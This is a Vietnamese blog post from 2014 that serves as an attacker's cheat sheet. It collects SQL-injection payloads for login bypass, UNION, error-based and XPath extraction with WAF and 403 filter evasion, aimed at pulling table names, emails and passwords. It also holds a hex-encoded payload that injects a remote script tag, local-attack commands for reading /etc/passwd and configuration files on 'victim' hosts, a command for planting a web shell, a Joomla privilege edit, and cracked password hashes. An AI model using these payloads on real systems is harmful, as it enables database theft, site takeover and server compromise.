25 thg 4, 2014

Tổng hợp vài câu lệnh check sqli

+++Bypass login ADMIN :
Username:user ' or 1=1# /admin' or '1'='1/ 1'or'1'='1
Password:pass ' or 1=1# /1'or'1'='1
++Tìm mã Hex Table

Encode Mã Hex Table~~~>http://www.convertstring.com/EncodeDecode/HexEncode
Encode ~~~>Encode http://www.base64encode.org/
Decode ~~~>Decode http://www.base64decode.org/

++My Sql Injection:http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
++Tổng hợp Sqli:http://sla.ckers.org/forum/list.php?16
++Tổng hợp Tut Sql các loại :http://khotien.com/diendan/default.aspx?g=posts&t=1759
++Tut SQLI dạng ASPX:http://root.vn/threads/sqli-khai-thac-doi-voi-aspx.2843/
++Tut SQLI các dạng :http://tutsql.blogspot.com/
++Các dạng Bypass :http://hack2play.blogspot.com/2013/03/waf-bypass-sql-injection-tips.html
++Tut SQLI dễ đến khó :http://nh0ksad.blogspot.com/2013/11/tu-de-en-kho-bypass-waf.html
++Tut hack SQL căn bản
http://sinhvienit.net/forum/tut-hack-sqli-injection-can-ban-cho-newbie-d.247389.html (TH id=null k dk thì id=-...)
++Khai thác Sql Bypass :
http://kechocgian.blogspot.com/2013/02/mot-so-cach-bypass-sql-injection.html
++Khai thác Sql Bypass Filter + 403 Forbidden
http://kechocgian.blogspot.com/2012/10/size6fontarial-blackcolorredtut-by-ke.html
++Tut EROBASE/DOUBLE:https://top-hat-sec.com/forum/index.php?topic=2061.0
++Các kĩ thuật Local Attack:http://ceh.vn/@4rum/showthread.php?tid=3031
++TUT Microsoft OLE DB :http://root.vn/threads/huong-dan-hack-database-qua-sql-injection.2773/
---------------------------------------------------------------------
**************Dạng Java :
***id=-123 UNION SELECT 1,2,concat((0x3c736372697074207372633d22687474703a2f2f6c616e6774756b6964732e636f6d2f73716c692e6a73223e3c2f7363726970743e))langtukids,4-- -
***id=-123'+/*!50000union+select*/ 1,2,concat/*!((0x3c736372697074207372633d22687474703a2f2f6c616e6774756b6964732e636f6d2f73716c692e6a73223e3c2f7363726970743e))*/,4-- -
------------------------------------
***Dạng Basic "and=0":
**Order lỗi : id=123 and=0 UNION SELECT 1,2-- -
Get table,column,data như bt thêm "and=0" sau id.
---------------------------------------------------------------------------
Check order :+/*!12345PROCEDURE*/+ANALYSE()-- -
-------------------------------------------------------------------
************Dạng Lồng + Bypass bt:
***Order: id=-1' uniounion SELECT 1,2,3-- -
***Get table: id=-1' uniounion SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
***Get column:id=-1' uniounion SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name=0x...-- -
***Get Data: id=-1' uniounion SELECT 1,group_concat(tên cột,0x207c20,tên cột,0x207c20),3 from tên table -- -
---------------------------------------------------------------
***********Dạng /*!Union*/ /*!Select*/ :
**Tìm Order lỗi :link victim+null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- -
**Get database :link victim+ /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!table_name*/) from information_schema./*!tables*/ where table_schema=database()-- -
**Get Colum:link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column_name*/) 4,5... from information_schema./*!columns*/ where /*!table_name*/=0x+mã hex table-- -
**Get data :link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!tên cột,0x7c,tên cột,0x7c,tên cột,0x7c*/) from tên table-- -
-----------------------------------------------------------------
**********Bypass nâng cao dạng /*!Union*/ /*!Select*/ loại ẩn:
***Order lỗi : id=-... /*!Union*/ /*!Select*/ 1,2,3...-- -
***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column_name*/))),3 from information_schema./*!columns*/ where /*!table_name*/=0x...()-- -
***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!tên cột,0x7c,tên cột,0x7c*/))),3 from table -- -
----------------------------------------------------------------
***************Dạng Bypass "=" chặn + ẩn :
***Order lỗi :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- -
***Get database:id=-..../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4 from information_schema. /*!50000tables*/ where /*!50000table_schema*/+like+database()-- -
***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column_name*/))),4 from information_schema. /*!50000columns*/ where /*!50000table_name*/+like+0x...()-- -
***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000tên cột,0x7c,tên cột,0x7c*/))),4 from table-- -
-----------------------------------------------------------------------
-----------------------------------------------------------------
********************Dạng Bypass 403 limit ***(Khó)
+++Order lỗi :id=-1'+/*!50000union+select*/+1,2,3,4 -- -
+++Get table:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,table_name)+from+information_schema.tables+where+table_schema=database()+limit+1,1-- - ( Để biết thêm table tăng limit lên 1,1-2,1-3,1...)
+++Get column:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,column_name)+from+information_schema.columns+where+table_name=0x...+limit+1,1-- -(Tăng limit)
+++Get data :id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,tên cột,tên cột)+from+tên table -- -
--------------------------------------------------------------------------------------------
----------------------------------Bypass 403 limit ****(cực kì khó)*****
***Tìm order lỗi :id=-1+/*!50000union+select*/+1,2,3-- -
***Get table:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,table_name))*/)+from+/*!information_schema*/.tables+where+table_schema=database()+limit+0,1-- -
***Get column:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,column_name))*/)+from+/*!information_schema*/.columns+where+table_name=0x...+limit+0,1-- -
***Get data:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,tên cột,tên cột))*/)+from+tên table-- -
-------------------------------------------------------------------------
-----------------------Dạng Bypass 403 (/*!00000UNION+SELECT*/)
***Order lỗi :id=-1'+/*!00000UNION+SELECT*/+1,2,3-- -
***Get Table :id=-1'+/*!00000UNION+SELECT*/+1,/*!00000group_cOncat(unhex(hex(table_name)))*/,3+/*!from*/+information_schema.tables+where+table_schema=database()-- -
***Get Column:id=-1'+/*!00000UNION+SELECT*/+1,/*!00000group_cOncat(unhex(hex(column_name)))*/,3+/*!from*/+information_schema.columns+where+table_name=0x...-- -
***Get Data:id=-1'+/*!00000UNION+SELECT*/+1,/*!00000group_cOncat(unhex(hex(tên cột,0x7c,tên côt,0x7c)))*/,3+from+teeb table-- -
-------------------------------------------------------------------------------------
*****************Dạng chặn () ~~~>cực kì khó.
***Order lỗi :UNION SELECT 1,2,3,4,5,6,7-- - (@@version)
***Get table:UNION SELECT 1,table_schema,3,4,5,6,7 from information_schema.tables where table_schema<>'information_schema' LIMIT 0,1-- - (Tăng limit )
***Get column :UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='tên table' and table_name=0x... LIMIT 0,1-- - (Tăng limit)
***Get Data :UNION SELECT 1,tên column,tên column,3,4,5,6,7 from tên table-- -
-------------------------------------------------------------------------------------------
***********************Bypass %0AUNION%0ASELECT :
***Order lỗi :id=-1'+%0AUNION%0ASELECT+1,2-- -
***Table:id=-1'+%0AUNION%0ASELECT+1,table_name+from+information_schema.tables
***Column:id=-1'+%0AUNION%0ASELECT+1,colum_name+from+information_schema.columns+where+table_name=0x....-- -
***Info Columns:id=-1'+%0AUNION%0ASELECT+1,tên column+from+tên table-- -
--------------------------------------------------------------------------
****************Dạng Lỗi String-500 ( Khai thác DB MSSQL-Giong ASPX)
***Order lỗi :id=-1' '1','2','3'-- -
***Get table:id=-1' '1',(select top 1 table_name from information_Schema.tables),'3'-- - **Get table tiếp :(select top 1 table_name from information_Schema.tables where table_name not in ('tên table 1'))**
***Get Column:id=-1' '1',(select top 1 column_name from information_schema.columns where table_name=('tên tbl'))),'3'-- - **Get column tiếp:(select top 1 column_name from information_Schema.columns where table_name='tên tbl' and column_name not in ('tên column1'))
***Get Data:id=-1' '1',select top 1 tên column%2b'|'%2b tên column from tên table),'3'-- -

------------------------------------------------------------------------------------
****************Dạng kết hợp Bypass 403 và 406 :
***Order lỗi : id=-1+/*!20000%0d%0aunion*/+/*!20000%0d%0aselect*/+1,2,3-- -
*****************Dạng Get data ẩn :
***group_concat(unhex(hex(tên cột)),0x7c,unhex(hex(tên cột)),0x7c,unhex(hex(tên cột)))+from+tên table-- -
-------------------------------------------------------------------------
****Bypass Filter khó (1 order or nhiều order )
***Get table :id=-1 Union Select group_concat(table_name) FrOm infOrMation_schema.tables
***Get Column :id=-1 Union Select group_concat(column_name) FrOm infOrMation_schema.tables where table_name=0x...-- -
Get Data:id=-1 Union Select group_concat(tên cột,0x7c,tên cột,0x7c) FrOm tên table-- -
*************Basic Get từng table :
***id=-1 UNION SELECT 1,table_name,3 from information_schema.tables limit 0,1-- - (Tăng limit để Get table tiếp theo )

------------------------------------------------------------------------
*******************Dạng id=-1 order by ....-- - không tìm được Order lỗi thì Biến đổi thành id=1' order by ...-- - rồi khai thác Bt.
~~~>K Get dk table thì id=-1' .... rồi khai thác BT.
***************Dạng Table ẩn (UnIoN SeLeCT):
**Order lỗi : id=-... UNION SELECT 1,2,3,...-- -
**Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (Thay database() vào order lỗi ).
**Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(table_name))),3,4,... from information_schema.tables where table_schema=database()-- -(Thêm unhex(hex nếu table dạng ẩn )
**Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,... from information_schema.columns where table_name=0x mã hex table-- -
**Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(tên cột,0x7c,tên cột,0x7c,tên cột))),4,5,6,7,8,9,10,11,12,13 from tên table-- -
----------------------------------------------------
--------------------------------------------------
Truy vấn table có chữ cái đầu và chữ cái cuối hay chuỗi kí tự Cho Erro base+Xpath:
======> and extractvalue(rand(),concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name like 'u%')))-- - (chữ cái đầu là u)
======>and extractvalue(rand(),concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name like '%u')))-- - ( chữ cái cuối là u)
======>and extractvalue(rand(),concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name like '%user%')))-- - ( Chuỗi kí tự )
--------------------------------------------------
********************Dạng bypass erro base :
1./*!and(select 1 from(select count(*),concat((select concat(0x7c,version())),floor(rand(0)*2))a from information_schema.columns group by a)d)*/
2./*!And(Select 1 From(Select Count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/ ~~~> Tăng limit để get thêm table.
3./*!And(Select 1 From(Select Count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name=0x... limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/
4./*!And(Select 1 From(Select Count(*),Concat((select concat(0x7c,tên côt,0x7c,tên cột) from tên table limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/
----------------------------------------------------------
****************XPath Injection(erro base) :
1.and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))-- -
2.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))-- -
3.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns where table_name=0x"table" limit 0,1)))-- -
4.and extractvalue(rand(),concat(0x7c,(select concat("column",0x7c,"column") from "table" limit 0,1)))-- -
-------------------------------------------
***Dạng Bypass Xpath( Khó )
1.' and extractvalue(rand(),concat/*!(0x7c,version(),0x7c,database(),0x7c,user())*/)-- -
2.' and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,table_name) from /*!information_schema*/.tables where table_schema=database() limit 0,1)))-- -
3.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,column_name) from /*!information_schema*/.columns where table_name=0x"table" limit 0,1)))-- -
4.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!("column",0x7c,"column") from "table" limit 0,1))*/)-- -
-----------------------------------------
*****************XPath Injection(erro base Cao Cấp )
1.or 1 group by concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) having min(1) or 1-- - /and updatexml(0,concat(0x7c,version(),0x7c,database(),0x7c,user()),0)-- -
2.and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
3.and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x... limit 0,1)),0)-- -
4.and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from tên table limit 0,1)),0)-- -
---------------------------------------------
++Khai thác SQL = Erro Base các loại:
http://ku96.blogspot.com/2012/07/mot-so-luu-y-khi-khai-thac-sql.html
http://demo-tainguyen.blogspot.com/2012/05/khai-thac-error-based-quick-blind.html
++Khai thác SQL Blind :
http://ceh.vn/@4rum/showthread.php?tid=1203

++less /etc/passwd
less =cat =more.

Bộ shell : http://www.mediafire.com/download/c42t1hz2954928v/shell.rar
Tìm link adm site
http://root.vn/threads/admin-finder-phan-mem-tim-link-admin-hieu-qua.3400/

++++++++++++++++++Tut LOCAL ATTACK:
http://www.mediafire.com/folder/8lya2k7axwi2y/tutorial
-------------------------BUG JOOMLA 1.5(COM_USER)
+++Công cụ :fire bug.
+++Path:domains/index.php?option=com_user&view=reset&layout=confirm -http://logigear.vn/index.php?option=com_user&view=register
+++Link:http://www.youtube.com/watch?v=kiVfu88mpDA
+++Edit :<input name="jform[groups][]" value="7" />
--------------------------LOCAL ATTACK------------------------------
+++++Tài liệu hướng dẫn Local Attack :http://ceh.vn/@4rum/showthread.php?tid=3031
+++Tut GetRoot cơ bản :http://tutlocal.blogspot.com/2013/06/tut-get-root-can-ban.html & http://www.mediafire.com/download/utyfyjcad47h58y/tut-localroot.rar
+++Lệnh view user đối vs Direc admin :
*cd /etc~~~>cat passwd
*less /etc/virtual/domainowners
+++View chuẩn xác user vs dùng Cpanel:
ls -la /etc/valiases/domain.com
+++View chmod :ls -la /path
+++Lệnh view config sever Joomla :
*less /user/domains/victim.com/public_html/configuration.php (Tùy Path)
+++Cú Pháp SSI SHELL :
Ip/~user/path (Sau public_html)
++Cmd coppy Shell:
cp path shell /home/user victim/public_html/1.php
--------------Pass MD5+SALT:
+++"1ead0efb9e47a371c301afbea8f57274:HmkI9oJSb8qdKzTXwfzJjdKwLSbUZDnZ" = 123456
+++WP :$P$B7u/NYhVtuYh/cBLFwjpMmeyImMaRb.=123456
+++VBB :MD5:bfffa5fdecdaff2ba90ce80234740db5
salt: <QU0OQ*_?^o"#.W>,S@`qpEYvu25l) =123456
-------------------------------An Ninh---------------------
+++Chống LOCAL: Chmod folder 501 và file config về 400 .
-------------------------------SEO---------------------
+++Check pr :http://www.thuvienseo.net/seotools/checkpagerank/

Không có nhận xét nào:

Đăng nhận xét